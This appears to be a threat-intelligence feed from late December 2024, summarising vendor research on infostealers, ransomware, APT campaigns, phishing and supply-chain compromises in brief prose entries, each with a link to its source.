Researchers from Cybereason have discussed the infostealer known as Lumma Stealer, which first emerged in 2022. The malware primarily targets Windows systems and steals sensitive information such as credentials, cookies, cryptocurrency wallets and other personal data. It is often spread through phishing emails, cracked software and fake downloads from malicious websites. LummaStealer operates as Malware-as-a-Service (MaaS), allowing various threat actors to subscribe and use the malware for their own malicious activities. Threat actors from Russia and China are believed to have used this stealer, particularly against logistics and transportation companies in North America.
Source: https://www.cybereason.com/blog/threat-analysis-rise-of-lummastealer
2024-12-29
NodeLoader_Exposed
MEDIUM
Intel Source:
Zscaler
Intel Name:
NodeLoader_Exposed
Date of Scan:
2024-12-29
Impact:
MEDIUM
Summary:
Researchers from Zscaler ThreatLabz have discovered a malware campaign called NodeLoader that uses Node.js applications to deliver cryptocurrency miners and information stealers to Windows systems. It also uses a tool called sudo-prompt, which is publicly available on GitHub, for privilege escalation. The attackers use social engineering on platforms like YouTube and Discord, where they upload fake tutorials or game hack videos. These videos include links that redirect users to malicious websites or popular file-sharing services like MediaFire, where they download ZIP files containing the NodeLoader executable. Once executed, NodeLoader runs a PowerShell script that downloads and installs additional malware such as XMRig, Lumma, and Phemedrone Stealer.
Source: https://www.zscaler.com/blogs/security-research/nodeloader-exposed-node-js-malware-evading-detection
2024-12-28
Python_Based_NodeStealer_Targets_Facebook
LOW
Intel Source:
Trend Micro
Intel Name:
Python_Based_NodeStealer_Targets_Facebook
Date of Scan:
2024-12-28
Impact:
LOW
Summary:
Researchers at Trend Micro have found a new Python-based variation of the NodeStealer malware that targets Facebook Ads Manager accounts and other sensitive data. This advanced version, discovered during a campaign against a Malaysian educational institution and linked to a Vietnamese threat group, is capable of harvesting credit card information, browser-stored data, and crucial business information.
Source: https://www.trendmicro.com/en_us/research/24/l/python-based-nodestealer.html
2024-12-28
Using_CAPTCHA_for_Compromise
MEDIUM
Intel Source:
Reliaquest
Intel Name:
Using_CAPTCHA_for_Compromise
Date of Scan:
2024-12-28
Impact:
MEDIUM
Summary:
Researchers from ReliaQuest have observed that cybercriminals are using fake CAPTCHA pages to trick users into running malicious commands and installing malware on their systems. These pages mimic trusted services like Google or Cloudflare to appear legitimate and lure victims. The attack starts when users visit compromised websites that redirect them to a fake CAPTCHA, which silently copies malicious commands to the user's clipboard using JavaScript. Users are then misled into pasting these commands into the Windows Run prompt, which installs malware such as infostealers or RATs that harvest sensitive data like login credentials or enable attackers to control the system remotely. The stolen credentials can then be used for data breaches, account hijacking, or financial fraud.
Source: https://www.reliaquest.com/blog/using-captcha-for-compromise/
2024-12-28
Cyber_Anarchy_Squad_Hacktivist_Attacks
LOW
Intel Source:
Securelist
Intel Name:
Cyber_Anarchy_Squad_Hacktivist_Attacks
Date of Scan:
2024-12-28
Impact:
LOW
Summary:
Researchers at Securelist have found ongoing attacks by the hacktivist group Cyber Anarchy Squad (C.A.S), which has been targeting Russian and Belarusian companies since 2022. C.A.S focuses on data theft and reputational damage, exploiting flaws in public-facing services and using free tools. Their incidents frequently feature ransomware, including leaked LockBit and Babuk builders, and unique identifiers such as the number 3119, which represents the group's initials. The group uses Telegram to publish victim information and stolen data and to promote its beliefs.
Source: https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/
2024-12-28
SideWinder_Group_Targeting_Sri_Lanka
LOW
Intel Source:
ThreatBook
Intel Name:
SideWinder_Group_Targeting_Sri_Lanka
Date of Scan:
2024-12-28
Impact:
LOW
Summary:
Researchers at ThreatBook have identified that the SideWinder APT group imitates the official email portal of the Sri Lankan Ministry of Defence for phishing.
Source: https://x.com/ThreatBookLabs/status/1872288256370585931
2024-12-27
TA397_Espionage_Tactics_Unveiled
LOW
Intel Source:
Proofpoint
Intel Name:
TA397_Espionage_Tactics_Unveiled
Date of Scan:
2024-12-27
Impact:
LOW
Summary:
Proofpoint researchers have detected the advanced persistent threat (APT) group TA397, also known as Bitter, targeting a Turkish defense sector company with a complex attack chain based on public infrastructure project lures. The attack began with a spear-phishing email carrying a RAR archive that used NTFS alternate data streams (ADS) to conceal PowerShell code behind a shortcut (LNK) file posing as a PDF.
Source: https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats
2024-12-27
Npm_Packages_Compromised_to_Distribute_XMRig_Miner
LOW
Intel Source:
Sonatype
Intel Name:
Npm_Packages_Compromised_to_Distribute_XMRig_Miner
Date of Scan:
2024-12-27
Impact:
LOW
Summary:
Three popular npm packages, @rspack/core, @rspack/cli, and Vant, were compromised through stolen npm account tokens, allowing attackers to publish malicious versions that installed the XMRig cryptocurrency miner. This attack, identified by Sonatype researchers, hit multiple versions of the packages on the same day, using the miner to illicitly mine the Monero cryptocurrency on affected systems.
Source: https://www.sonatype.com/blog/npm-packages-rspack-vant-compromised-blocked-by-sonatype
2024-12-27
MUT_1244_Targets_Offensive_Actors
LOW
Intel Source:
Datadog Security Labs
Intel Name:
MUT_1244_Targets_Offensive_Actors
Date of Scan:
2024-12-27
Impact:
LOW
Summary:
Researchers at Datadog Security Labs have discovered a threat actor tracked as MUT-1244 that targets offensive actors such as security researchers, pentesters, and malicious threat actors via phishing campaigns and trojanized GitHub repositories. MUT-1244 campaigns include a second-stage payload that exfiltrates sensitive data such as SSH private keys, AWS access keys, and environment variables.
Source: https://securitylabs.datadoghq.com/articles/mut-1244-targeting-offensive-actors/
2024-12-26
Malicious_Intent_in_Python_Code
LOW
Intel Source:
Fortinet
Intel Name:
Malicious_Intent_in_Python_Code
Date of Scan:
2024-12-26
Impact:
LOW
Summary:
Fortinet researchers have identified two malicious Python packages, Zebo-0.1.0 and Cometlogger-0.1, which disguise themselves as legitimate software while hiding malicious functionality. Zebo-0.1.0 is malware that spies on users and steals sensitive information. Its features include capturing keystrokes with a keylogger, taking regular screenshots of the victim's desktop and uploading the stolen data to a remote server. Cometlogger-0.1 shows even more advanced malicious behaviour. It dynamically manipulates code at runtime, injecting webhook URLs into Python scripts to send stolen data to remote servers. It collects sensitive user information such as passwords, tokens, session cookies and browsing history from platforms like Discord and Twitter, potentially enabling account hijacking and identity theft.
Source: https://www.fortinet.com/blog/threat-research/analyzing-malicious-intent-in-python-code
2024-12-26
Andariel_Group_Using_SmallTiger_Malware
LOW
Intel Source:
ASEC
Intel Name:
Andariel_Group_Using_SmallTiger_Malware
Date of Scan:
2024-12-26
Impact:
LOW
Summary:
The Andariel group has been targeting software used by domestic companies, including asset management and data leak prevention (DLP) solutions, for several years. In the second half of 2024, their attacks persisted, focusing on installing SmallTiger malware. Key targets included a widely used domestic asset management solution and a document centralization solution, both of which had been exploited for an extended period.
Source: https://asec.ahnlab.com/ko/85270/
2024-12-26
Festive_Season_Cyber_Threats
LOW
Intel Source:
Cyfirma
Intel Name:
Festive_Season_Cyber_Threats
Date of Scan:
2024-12-26
Impact:
LOW
Summary:
Researchers from CYFIRMA have discovered that festive events and holidays have become prominent targets for cybercriminals and hacktivists, who take advantage of the increase in online transactions and retail activity during these periods. Threats include automated incidents that take advantage of security flaws, client-side data breaches that target payment information, and advanced bots that engage in fraudulent activities such as price scraping and account compromise.
Source: https://www.cyfirma.com/research/how-festive-events-have-become-prime-targets-for-digital-exploitation-and-fraud/
2024-12-26
Exploring_the_Advanced_Tactics_of_APT34__OilRig
MEDIUM
Intel Source:
Picus
Intel Name:
Exploring_the_Advanced_Tactics_of_APT34__OilRig
Date of Scan:
2024-12-26
Impact:
MEDIUM
Summary:
OilRig (APT34), also known as Helix Kitten, is a state-sponsored cyber espionage group with a focus on the Middle East. The group has targeted critical sectors like government, energy, telecommunications, and technology services, using advanced tactics to gather intelligence and exert geopolitical influence. Notable incidents include the Helminth Backdoor Campaign (2016), where OilRig used spearphishing and the Helminth backdoor to infiltrate Saudi Arabian organizations, and the QUADAGENT Deployment (2018), where they exploited supply chain vulnerabilities by targeting a technology services provider, deploying a stealthy PowerShell-based backdoor. In 2024, OilRig leveraged the CVE-2024-30088 vulnerability to escalate privileges and deploy the STEALHOOK backdoor, which allowed them to perform data extraction and lateral movement across networks.
Source: https://www.picussecurity.com/resource/blog/oilrig-exposed-tools-techniques-apt34
2024-12-26
Gosar_Malware
LOW
Intel Source:
Elastic Labs
Intel Name:
Gosar_Malware
Date of Scan:
2024-12-26
Impact:
LOW
Summary:
Elastic researchers have identified a campaign tracked as REF3864 that targets Chinese-speaking users by impersonating legitimate software such as Telegram and the Opera browser. The attackers use the SADBRIDGE loader to deploy GOSAR, a new variant of the QUASAR backdoor, which can infect Windows, Linux, and Android devices. The attack starts with an MSI installer distributed via fake landing pages. When run, it uses DLL side-loading and process injection to deploy the GOSAR payload, which can steal sensitive information, hide from antivirus software and run on different operating systems.
Source: https://www.elastic.co/security-labs/under-the-sadbridge-with-gosar
2024-12-26
Evolving_Cryptomining_Threat
LOW
Intel Source:
Threatdown
Intel Name:
Evolving_Cryptomining_Threat
Date of Scan:
2024-12-26
Impact:
LOW
Summary:
Researchers at ThreatDown have discovered that the Sysrv cryptomining botnet is still active and has evolved to aggressively remove competing malware, ensuring exclusive access to system resources. Sysrv first gained attention in 2020 for using Golang to build multi-platform malware targeting both Windows and Linux, and it has since evolved. Recent analysis of its PowerShell scripts revealed that the botnet exploits vulnerabilities to gain a foothold, disables Windows Firewall, and kills processes associated with other cryptominers such as XMRig.
Source: https://www.threatdown.com/blog/sysrv-cryptomining-botnet-is-still-alive-and-kicking-out-the-competition/
2024-12-25
Araneida_Scanner
LOW
Intel Source:
Silent Push
Intel Name:
Araneida_Scanner
Date of Scan:
2024-12-25
Impact:
LOW
Summary:
Silent Push researchers have uncovered a tool called the Araneida Scanner. It appears to be based on a cracked version of Acunetix, a legitimate web application security testing tool. However, it is being misused for illegal activities, including stealing user data and identifying vulnerabilities for exploitation. Araneida is promoted on platforms like Telegram, where it is sold alongside stolen credentials. These Telegram channels also provide instructions for malicious use of the tool.
Source: https://www.silentpush.com/blog/araneida-scanner-acunetix/?utm_source=rss&utm_medium=rss&utm_campaign=araneida-scanner-acunetix
2024-12-25
SSH_Reverse_Backdoor_with_SOCKS_Proxy_for_Control
LOW
Intel Source:
ISC.SANS
Intel Name:
SSH_Reverse_Backdoor_with_SOCKS_Proxy_for_Control
Date of Scan:
2024-12-25
Impact:
LOW
Summary:
The discovered Windows batch script leverages SSH to create a reverse backdoor on the victim's machine. It adds a registry entry for persistence and uses SSH with options that allow executing local commands, such as downloading and running a malicious executable (`Ghost.exe`). This executable is fetched from a URL hosted on a domain associated with Visual Studio's Dev Tunnels feature, which was repurposed for the attack. The reverse SSH tunnel acts as a SOCKS proxy, enabling the attacker to route traffic through the compromised machine. This method is a sophisticated way to establish remote control, likely via a RAT, while evading detection.
Source: https://isc.sans.edu/diary/More+SSH+Fun/31542/
2024-12-25
Threat_Actors_Gift_Holiday_Lures
LOW
Intel Source:
Proofpoint
Intel Name:
Threat_Actors_Gift_Holiday_Lures
Date of Scan:
2024-12-25
Impact:
LOW
Summary:
Proofpoint researchers have observed a surge in phishing and fraud schemes leveraging holiday-themed lures, such as promotions for deals, bonuses, and job offers. A variety of attacks, including credential phishing and malware delivery, have been identified, with attackers impersonating airlines, HR departments, and even reputable nonprofits like Project HOPE. For example, one phishing campaign used fake holiday bonus messages to trick employees into entering their login credentials on counterfeit Microsoft pages.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-gift-holiday-lures-threat-landscape
2024-12-25
Early_Warning_Signs_of_Ransomware_Double_Extortion
MEDIUM
+
Intel Source:
CATO Network
Intel Name:
Early_Warning_Signs_of_Ransomware_Double_Extortion
Date of Scan:
2024-12-25
Impact:
MEDIUM
Summary:
Recent investigations by the Cato CTRL and Cato MDR teams have uncovered a critical early warning sign for double extortion tactics used by ransomware groups, particularly Hunters International and Play. Both groups exhibit unusual internal data-copying activities as an early indicator of exfiltration, which often goes undetected. Hunters International, a new and highly active ransomware group that emerged in late 2023, operates under the Ransomware-as-a-Service (RaaS) model, providing tools and services to other cybercriminals. It is believed to have evolved from the defunct Hive ransomware gang. The Play ransomware gang is known for its sophisticated tactics and rapid evolution. It exploits vulnerabilities in public-facing applications, including FortiOS and Microsoft Exchange, and leverages services like Remote Desktop Protocol (RDP) and VPNs for initial access. Both groups are significant threats to organizations globally.
Source: https://www.catonetworks.com/blog/sophisticated-data-exfiltration-tools-used-in-double-extortion-ransomware-attacks/
2024-12-24
LYNX_Ransomware_Targets_Energy_Sector
LOW
+
Intel Source:
Cyble
Intel Name:
LYNX_Ransomware_Targets_Energy_Sector
Date of Scan:
2024-12-24
Impact:
LOW
Summary:
Researchers from Cyble have highlighted the growing threat posed by the LYNX ransomware group, encouraging energy sector firms to proactively monitor their IT and key infrastructure for harmful binaries. This followed a ransomware attack on December 9, 2024, that targeted Electrica Group, Romania's largest energy provider.
Source: https://cyble.com/blog/romania-urges-energy-sector-of-proactive-scanning-amid-lynx-ransomware-threat/
2024-12-24
Technical_Analysis_of_RiseLoader
LOW
+
Intel Source:
Zscaler
Intel Name:
Technical_Analysis_of_RiseLoader
Date of Scan:
2024-12-24
Impact:
LOW
Summary:
Zscaler ThreatLabz has discovered a malware family called RiseLoader, which emerged in October 2024. It acts as a loader that downloads and executes other malicious payloads on the victim's machine. The malware uses a network communication protocol similar to that of RisePro, an information-stealing malware. RiseLoader focuses on distributing second-stage malware such as Vidar, Lumma Stealer, XMRig and Socks5Systemz. It also collects information about installed applications and cryptocurrency-related browser extensions, behavior also seen in both RisePro and PrivateLoader.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-riseloader
2024-12-23
Exploring_the_Advanced_Tactics_of_APT34_OilRig
LOW
+
Intel Source:
Picus
Intel Name:
Exploring_the_Advanced_Tactics_of_APT34_OilRig
Date of Scan:
2024-12-23
Impact:
LOW
Summary:
OilRig (APT34), also known as Helix Kitten, is a state-sponsored cyber espionage group with a focus on the Middle East. The group has targeted critical sectors like government, energy, telecommunications, and technology services, using advanced tactics to gather intelligence and exert geopolitical influence. Notable incidents include the Helminth Backdoor Campaign (2016), where OilRig used spearphishing and the Helminth backdoor to infiltrate Saudi Arabian organizations, and the QUADAGENT Deployment (2018), where they exploited supply chain vulnerabilities by targeting a technology services provider, deploying a stealthy PowerShell-based backdoor. In 2024, OilRig leveraged the CVE-2024-30088 vulnerability to escalate privileges and deploy the STEALHOOK backdoor, which allowed them to perform data extraction and lateral movement across networks.
Source: https://www.picussecurity.com/resource/blog/oilrig-exposed-tools-techniques-apt34
2024-12-23
LockBit_4_0_Ransomware
HIGH
+
Intel Source:
TheRavenFile
Intel Name:
LockBit_4_0_Ransomware
Date of Scan:
2024-12-23
Impact:
HIGH
Summary:
Cybersecurity experts have reported that the LockBit ransomware group has launched LockBit 4.0, signaling a full comeback after a year of law enforcement crackdowns. In related news, the U.S. Department of Justice has charged Rostislav Panev, a 51-year-old Russian-Israeli dual-national, for his alleged involvement in developing LockBit ransomware encryptors and the "StealBit" data-theft tool, as outlined in a criminal complaint unsealed in New Jersey.
Source: https://github.com/TheRavenFile/Daily-Hunt/blob/main/LockBit%204.0%20Ransomware
2024-12-23
Vishing_Attack_Installs_DarkGate
LOW
+
Intel Source:
Trend Micro
Intel Name:
Vishing_Attack_Installs_DarkGate
Date of Scan:
2024-12-23
Impact:
LOW
Summary:
Researchers at Trend Micro have discovered an attack that used vishing over Microsoft Teams to deliver DarkGate malware. The attacker employed social engineering by impersonating a known client during a Teams session and convincing the victim to download AnyDesk for remote access. Once access was gained, the attacker installed harmful files, including one detected as Trojan.AutoIt.DARKGATE.D. Using an AutoIt script, the malware ran commands, connected to a command-and-control server, collected system information, and established persistence mechanisms.
Source: https://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html
2024-12-23
Christmas_Gift_Delivered_Through_SSH
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Christmas_Gift_Delivered_Through_SSH
Date of Scan:
2024-12-23
Impact:
LOW
Summary:
Researchers from ISC.SANS have observed attackers taking advantage of the Christmas season to deliver "gifts" to mailboxes in the form of a malicious shortcut file dubbed christmas_slab.pdf[.]lnk. When the file is opened, it triggers a process that runs ssh.exe, which connects to a remote server and downloads a malicious executable to the victim's machine. Once the payload is executed, the attacker passes their own IP address and a username as parameters to the malicious file.
Source: https://isc.sans.edu/diary/Christmas+Gift+Delivered+Through+SSH/31538/
2024-12-23
Phishing_Campaign_Targets_Businesses
LOW
+
Intel Source:
CloudSEK
Intel Name:
Phishing_Campaign_Targets_Businesses
Date of Scan:
2024-12-23
Impact:
LOW
Summary:
A sophisticated malware campaign is targeting businesses via email phishing, using trusted brand names and professional collaboration offers as bait. The emails, which often contain malicious attachments disguised as business proposals or promotional materials, are sent from spoofed or compromised addresses. When recipients open the attachments (e.g., Word, PDF, or Excel files), the malware is activated, stealing sensitive data or providing remote access to attackers. The primary targets are individuals in marketing, sales, and executive roles, who are likely to engage in business opportunities.
Source: https://www.cloudsek.com/blog/how-threat-actors-exploit-brand-collaborations-to-target-popular-youtube-channels
2024-12-22
CleverSoar_Campaign
LOW
+
Intel Source:
Esentire
Intel Name:
CleverSoar_Campaign
Date of Scan:
2024-12-22
Impact:
LOW
Summary:
The eSentire team has discovered a malware campaign involving a new malware installer called CleverSoar. This malware mainly targets Chinese- and Vietnamese-speaking users through malicious installer packages delivered via poisoned search results. These packages install two tools: the Winos4.0 framework, which is used for advanced hacking activities, and the Nidhogg rootkit, which helps the malware stay hidden and maintain access. In this campaign, the Winos4.0 framework, referred to as the Online Module, is built on the Gh0st RAT malware. It allows attackers to use plugins for spying on and controlling compromised Windows systems.
Source: https://www.esentire.com/blog/winos4-0-online-module-staging-component-used-in-cleversoar-campaign
2024-12-22
Linking_Malicious_Infrastructure_to_Infostealers
LOW
+
Intel Source:
Vasilis Orlof
Intel Name:
Linking_Malicious_Infrastructure_to_Infostealers
Date of Scan:
2024-12-22
Impact:
LOW
Summary:
A search for specific nginx versions running on port 19000 revealed 17 hosts, with a notable presence of Windows Server 2012, which previously helped identify infrastructure linked to the Rhadamanthys infostealer. This suggests that the infrastructure is likely used by multiple threat actors, primarily serving infostealers and RATs. A refined search returned 29 results, excluding 7 IPs already reported, leaving 22 unique IPs. Of these, 6 were previously reported, reinforcing the hypothesis and linking these IPs to malicious infrastructure with moderate to high confidence. However, the absence of SSH fingerprints limited further associations.
Source: https://intelinsights.substack.com/p/a-multi-actor-infrastructure-investigation
2024-12-22
Recent_Kimsuky_Infrastructure_Trends
LOW
+
Intel Source:
Hunt.IO
Intel Name:
Recent_Kimsuky_Infrastructure_Trends
Date of Scan:
2024-12-22
Impact:
LOW
Summary:
Hunt.IO researchers have discovered recent operations tied to the North Korean threat group Kimsuky, which involved websites returning the unique HTTP response "Million OK!!!!". These domains mimic the branding of Naver, a South Korean technology company, but have no real relationship to it. The group's continued use of previously known top-level domains such as p-e.kr, o-r.kr, and n-e.kr suggests that its infrastructure is being actively maintained and expanded. This activity shows Kimsuky's technique of using familiar branding to boost the perceived legitimacy of its malicious activities.
Source: https://hunt.io/blog/million-ok-naver-facade-kimsuky-tracking
2024-12-21
Autonomous_System_Spearphishing
LOW
+
Intel Source:
Proofpoint
Intel Name:
Autonomous_System_Spearphishing
Date of Scan:
2024-12-21
Impact:
LOW
Summary:
In December 2024, a spearphishing campaign targeted over 20 Autonomous System (AS) owners, mostly Internet Service Providers (ISPs), by impersonating the Network Operations Center (NOC) of a major European ISP. The emails, sent to contact addresses in AS WHOIS records, claimed to address BGP flapping issues and were personalized based on the target's Autonomous System Number (ASN). The emails contained a password-protected RAR archive with a malicious Microsoft Shortcut file that triggered an executable to load shellcode and self-delete.
Source: https://x.com/threatinsight/status/1867312362572984579
2024-12-21
Using_LLMs_to_Obfuscate_Malicious_JavaScript
LOW
+
Intel Source:
Palo Alto
Intel Name:
Using_LLMs_to_Obfuscate_Malicious_JavaScript
Date of Scan:
2024-12-21
Impact:
LOW
Summary:
Palo Alto researchers have developed a tool that uses large language models to generate new versions of malicious JavaScript code at scale, which helps them improve their detection of such threats. They created a process that uses an LLM repeatedly to rewrite malicious JavaScript while maintaining its original behaviour. They also use techniques such as renaming variables, adding unused code, and removing extra spaces, validating each time to ensure the malicious activity stays intact. This approach significantly reduces the number of security tools on VirusTotal that flag the samples as malicious.
Source: https://unit42.paloaltonetworks.com/using-llms-obfuscate-malicious-javascript/
2024-12-21
BellaCiao_Campaign_Adds_BellaCPP
LOW
+
Intel Source:
Securelist
Intel Name:
BellaCiao_Campaign_Adds_BellaCPP
Date of Scan:
2024-12-21
Impact:
LOW
Summary:
Researchers at Securelist have observed the BellaCiao malware family, which is linked to the Charming Kitten APT group, evolve with the development of BellaCPP, a C++ variant of the .NET-based malware. BellaCiao combines the stealth of a webshell with the capacity to create hidden tunnels, and its PDB paths expose target-specific data and versions. BellaCPP, discovered alongside a .NET BellaCiao sample on a machine in Asia, runs as a Windows service, decrypting strings to load DLLs, resolve functions, and build target-specific domains.
Source: https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/
2024-12-20
Malichus_Malware_via_Cleo_Exploit
MEDIUM
+
Intel Source:
Huntress
Intel Name:
Malichus_Malware_via_Cleo_Exploit
Date of Scan:
2024-12-20
Impact:
MEDIUM
Summary:
Researchers at Huntress have discovered malicious behavior leveraging a 0-day vulnerability in Cleo software, which resulted in the distribution of Malichus, a newly found malware family. This malware, named after Malichus I, who retaliated against Cleopatra by destroying her navy fleet, has been studied, and a comprehensive technical breakdown is provided.
Source: https://www.huntress.com/blog/cleo-software-vulnerability-malware-analysis
2024-12-20
NotLockbit_Ransomware_Group
MEDIUM
+
Intel Source:
Qualys
Intel Name:
NotLockbit_Ransomware_Group
Date of Scan:
2024-12-20
Impact:
MEDIUM
Summary:
Researchers at Qualys have discovered new ransomware called NotLockbit that mimics the behaviour and tactics of the LockBit ransomware group. It is written in the Go programming language and targets both macOS and Windows operating systems. The ransomware uses advanced techniques such as encrypting files, stealing data, and deleting itself. NotLockbit has the ability to exfiltrate files to remote storage such as Amazon S3 buckets, enabling attackers to employ double-extortion tactics. The ransomware gathers information about the macOS system to better understand the target for maximum impact.
Source: https://blog.qualys.com/vulnerabilities-threat-research/2024/12/18/notlockbit-a-deep-dive-into-the-new-ransomware-threat
2024-12-20
PUMAKIT_Malware
LOW
+
Intel Source:
Elastic Labs
Intel Name:
PUMAKIT_Malware
Date of Scan:
2024-12-20
Impact:
LOW
Summary:
Elastic researchers have uncovered a complex and advanced malware designed to target Linux systems. It operates in stages, including a dropper that deploys the malware, two temporary files stored in memory, a kernel-level rootkit and a user-level rootkit. The kernel rootkit, called PUMA, uses advanced techniques to modify the Linux operating system, which allows it to hide files, directories and itself. The malware uses the rmdir (remove directory) command to gain full control of the system and interact with the rootkit. Its main functions include giving attackers high-level access, hiding malicious activities, communicating with remote servers, and ensuring it stays hidden and operational.
Source: https://www.elastic.co/security-labs/declawing-pumakit
2024-12-20
Lynx_Ransomware_Targets_Utilities
MEDIUM
+
Intel Source:
CIS
Intel Name:
Lynx_Ransomware_Targets_Utilities
Date of Scan:
2024-12-20
Impact:
MEDIUM
Summary:
Researchers at the Center for Internet Security (CIS) have highlighted the growing threat of the Lynx ransomware group targeting utilities, especially in sectors like energy, oil, and gas. The group has impacted over 20 victims in the U.S. The group was highly active between 2022 and 2024, exploiting vulnerabilities in outdated systems and weak security practices.
Source: https://www.cisecurity.org/insights/blog/lynx-ransomware-pouncing-utilities
2024-12-20
Cybercriminals_Target_AWS_with_Advanced_Techniques
MEDIUM
+
Intel Source:
Datadog
Intel Name:
Cybercriminals_Target_AWS_with_Advanced_Techniques
Date of Scan:
2024-12-20
Impact:
MEDIUM
Summary:
Datadog researchers have observed that attackers are targeting Amazon Web Services (AWS) accounts using advanced techniques to maintain long-term access. They leverage their own AWS account to gain access, use a VPN service to avoid detection, and set up backdoors by creating fake users and roles with admin rights. They create a fake admin role named SupportAWS and link it to their AWS account. Once inside, they check the Simple Email Service (SES) to see if it can be used for sending spam or phishing emails. The attackers also use automated tools to gather more information across different AWS regions.
Source: https://securitylabs.datadoghq.com/articles/tales-from-the-cloud-trenches-unwanted-visitor/
2024-12-19
BIZFUM_STEALER
LOW
+
Intel Source:
Cyfirma
Intel Name:
BIZFUM_STEALER
Date of Scan:
2024-12-19
Impact:
LOW
Summary:
Cyfirma researchers have uncovered a malware called Bizfum Stealer which is available on GitHub. It primarily targets multiple browsers like Chrome, Firefox, and Edge to steal information such as browser credentials, files, and Discord tokens. Additionally, it also collects clipboard content and can take screenshots of the victim's desktop, enabling attackers to capture visual data about the victim's activities. Bizfum Stealer has the capability to encrypt data using RSA encryption and sends all the stolen data to the attacker through a Telegram bot.
Source: https://www.cyfirma.com/research/bizfum-stealer/
2024-12-19
Banking_Trojan_Disguised_as_Parcel_App
LOW
+
Intel Source:
Securelist
Intel Name:
Banking_Trojan_Disguised_as_Parcel_App
Date of Scan:
2024-12-19
Impact:
LOW
Summary:
Researchers at Securelist have discovered fraudulent activity in which attackers deploy a banking Trojan disguised as a parcel-tracking app. This scheme targets both individuals and businesses by luring victims with seemingly authentic bulk-priced offers, causing them to contact the scammers first, thus establishing trust. The Trojan can steal login credentials through customizable windows and control SMS banking services.
Source: https://securelist.com/mamont-banker-disguised-as-parcel-tracking-app/115006/
2024-12-19
IOCONTROL
LOW
+
Intel Source:
Claroty
Intel Name:
IOCONTROL
Date of Scan:
2024-12-19
Impact:
LOW
Summary:
Team82 has uncovered a sophisticated IoT/OT malware, IOCONTROL, believed to be developed by Iranian-affiliated hackers, targeting critical infrastructure in Israel and the U.S. The malware has affected a range of devices, including routers, programmable logic controllers (PLCs), and fuel management systems, such as those from Orpak and Gasboy. IOCONTROL’s modular design allows it to target a variety of platforms, making it a versatile cyberweapon. The attacks, attributed to the CyberAv3ngers group, a faction linked to Iran's Islamic Revolutionary Guard Corps Cyber Electronic Command, are part of ongoing cyber warfare tied to geopolitical tensions. The malware uses the MQTT protocol to securely communicate with command-and-control servers, enabling the attackers to disrupt services and potentially steal sensitive data. Team82’s analysis also revealed IOCONTROL’s sophisticated evasion techniques, including encryption and obfuscation to avoid detection.
Source: https://claroty.com/team82/research/inside-a-new-ot-iot-cyber-weapon-iocontrol
2024-12-19
Google_Ads_Spread_SocGholish_Malware
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Google_Ads_Spread_SocGholish_Malware
Date of Scan:
2024-12-19
Impact:
LOW
Summary:
Researchers at Malwarebytes have found a malicious campaign that used Google Search Ads to target Kaiser Permanente employees. The fake advertisements, disguised as links to the healthcare company's HR portal, attempted to phish employees for login credentials. Victims who clicked on the advertisements were routed to a compromised website asking them to upgrade their browser. This message was part of the SocGholish malware campaign, which infects machines and may enable human operators to carry out malicious activities if the target appears valuable.
Source: https://www.malwarebytes.com/blog/news/2024/12/malicious-ad-distributes-socgholish-malware-to-kaiser-permanente-employees
2024-12-18
Cloak_Ransomware
MEDIUM
+
Intel Source:
Halcyon
Intel Name:
Cloak_Ransomware
Date of Scan:
2024-12-18
Impact:
MEDIUM
Summary:
Researchers from Halcyon have discovered a ransomware group called Cloak that first appeared in 2022. The group mainly targets small to medium-sized businesses in Europe but has now expanded its operations to Asia, targeting sectors such as healthcare, IT, manufacturing, real estate, construction, and food industries. The group gains access to victim networks by purchasing access from Initial Access Brokers or using social engineering techniques such as phishing, malvertising, and drive-by downloads disguised as Microsoft Windows installers. Victims are presented with ransom notes as desktop wallpapers and text files named readme_for_unlock.txt. If they refuse to pay, their stolen data is published on Cloak's Data Leak Site.
Source: https://www.halcyon.ai/blog/cloak-ransomware-variant-exhibits-advanced-persistence-evasion-and-vhd-extraction-capabilities
2024-12-18
Python_Delivering_AnyDesk_Client_as_RAT
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Python_Delivering_AnyDesk_Client_as_RAT
Date of Scan:
2024-12-18
Impact:
LOW
Summary:
Remote access tools have become some of the most popular tools among cybercriminals. They are used for both legitimate and malicious purposes. They allow users to remotely manage devices, access files, or troubleshoot systems. From an attacker's perspective, they are used for spying, stealing data, and moving laterally within a network. Researchers also identified a Python script called an5[.]py that installs AnyDesk on the victim's machine and works on both Windows and Linux computers.
Source: https://isc.sans.edu/diary/Python+Delivering+AnyDesk+Client+as+RAT/31524/
2024-12-18
Scammers_Mimic_Dubai_Police_to_Defraud_UAE_People
LOW
+
Intel Source:
Resecurity
Intel Name:
Scammers_Mimic_Dubai_Police_to_Defraud_UAE_People
Date of Scan:
2024-12-18
Impact:
LOW
Summary:
Resecurity researchers have uncovered a campaign in which cybercriminals are targeting people in the UAE by impersonating law enforcement officials such as Dubai Police. Victims are asked to pay fake online fines for traffic tickets, parking violations, or license renewals. The scammers use phishing, smishing and vishing tactics to deceive victims with threats of driving license revocation or vehicle seizure. These scams include links to payment pages that mimic legitimate government websites, making victims believe the requests are genuine.
Source: https://www.resecurity.com/blog/article/cybercriminals-impersonate-dubai-police-to-defraud-consumers-in-the-uae-smishing-triad-in-action
2024-12-16
FLUXCONSOLE
MEDIUM
+
Intel Source:
SecuronixThreatLabs
Intel Name:
FLUXCONSOLE
Date of Scan:
2024-12-16
Impact:
MEDIUM
Summary:
The Securonix Threat Research team has been monitoring an interesting tax-related phishing campaign where threat actors leveraged MSC files and advanced obfuscation techniques to execute a stealthy backdoor payload. The FLUX#CONSOLE campaign covers a rather interesting approach that threat actors are taking to deliver malware and to skirt traditional AV detections. One of the more notable aspects of the campaign is how the threat actors leverage MSC (Microsoft Common Console Document) files to deploy a dual-purpose loader and dropper to deliver further malicious payloads. This loader efficiently handles both payload delivery and execution, leading to a stealthy and highly obfuscated backdoor DLL file.
Source: https://docs.google.com/spreadsheets/d/1tJ43FIQCeCMpODTVQZIiE6Ycn0Y0ZeJdEiFo6JWjTjA/edit?gid=1879729669#gid=1879729669
2024-12-14
